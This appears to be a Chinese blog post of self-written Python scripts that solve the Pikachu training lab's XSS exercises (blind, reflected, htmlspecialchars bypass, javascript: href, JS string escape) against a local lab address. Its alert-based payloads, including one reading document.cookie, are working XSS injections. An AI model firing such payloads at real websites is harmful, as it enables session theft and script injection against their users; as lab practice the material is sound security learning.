pikachu自编exp,xss之盲打,过滤,htmlspecialchars,href,js

xss之盲打

复制代码
#盲打的意思就是,你注入的内容,不会在前台出现,只有放管理员在后台触发时候,才会执行回显

过滤

htmlspecialchars

复制代码
#htmlspecialchars () 没有加 ENT_QUOTES,单引号 ' 不被转义,导致可以闭合属性、插入恶意事件。

href

复制代码
#href 输出:没过滤协议 → javascript: 执行代码

js

复制代码
#JS 输出:没转义引号 → 闭合字符串执行代码
复制代码
#盲打的意思就是,你注入的内容,不会在前台出现,只有放管理员在后台触发时候,才会执行回显
import requests

url = "http://192.168.8.1/pikachu-master/vul/xss/xssblind/xss_blind.php"

payload = "<script>alert(document.cookie)</script>"

resp = requests.post(url, data={"content":payload,"name":"name"})

print("[+] 注入完成! ")
print("[+] 检测是否注入成功: ",payload in resp.text)
复制代码
import requests

url = "http://192.168.8.1/pikachu-master/vul/xss/xss_01.php"

payload = "<Script>alert(1)</Script>"

resp = requests.get(url,params={"message":payload,"submit":"submit"})

print("[+] 完成注入")
print("[+] 查看是否注入成功: ",'<Script>' in resp.text)
复制代码
#htmlspecialchars () 没有加 ENT_QUOTES,单引号 ' 不被转义,导致可以闭合属性、插入恶意事件。
import requests

url = "http://192.168.8.1/pikachu-master/vul/xss/xss_02.php"

payload = "' onclick='alert(1)'"

resp = requests.get(url,params={"message":payload,"submit":"submit"})

print("[+] 注入完成")
print("[+] 查看是否注入成功: ",payload in resp.text)
print("点击一下页面,弹出弹框")
复制代码
#href 输出:没过滤协议 → javascript: 执行代码
import requests

url = "http://192.168.8.1/pikachu-master/vul/xss/xss_03.php"

payload = "javascript:alert(1);"

resp = requests.get(url, params={"message":payload,"submit":"submit"})

print("[+] 注入完成")
print("[+] 查看注入是否成功:",payload in resp.text )
print("[+] 点击页面的链接")
print(f"[+] 或者点击:{url}?message={payload}")
复制代码
#JS 输出:没转义引号 → 闭合字符串执行代码
import requests

url = "http://192.168.8.1/pikachu-master/vul/xss/xss_04.php"

payload =  "';alert(1);//"

resp = requests.get(url,params={"message":payload,"submit":"submit"})

print("[+] 注入完成")
print("[+] 查看是否注入成功: ","alert" in resp.text)
相关推荐
用户479492835691529 分钟前
6w star,GitHub 趋势第一的 Ponytail,这个agent插件到底在火什么
前端·后端
薛定喵的谔2 小时前
我开源了一个精致的 Next.js 博客模板:Skyplume
前端·前端框架·next.js
张龙6872 小时前
构建生产级 AI Agent:工具调用与记忆架构实战指南
前端
kyriewen3 小时前
2026 年了,还在用 Node.js?Bun 迁移实战:20 分钟搞定,附踩坑记录
前端·javascript·node.js
青山Coding5 小时前
Cesium应用(八):物体运动的实现思路
前端·cesium
用户41659673693555 小时前
Android WebView 加载 file:// 离线页面调试教程
android·前端
Asmewill5 小时前
curl命令学习笔记一
前端
我是一只快乐的小螃蟹5 小时前
1.2 ArrayList 源码解析
前端
星栈5 小时前
我用 Rust + Dioxus 做了个全栈跨平台笔记应用:再把新建、编辑和交付补上
前端·rust·前端框架
我是一只快乐的小螃蟹5 小时前
1.1 HashMap (JDK1.8) 源码解析
前端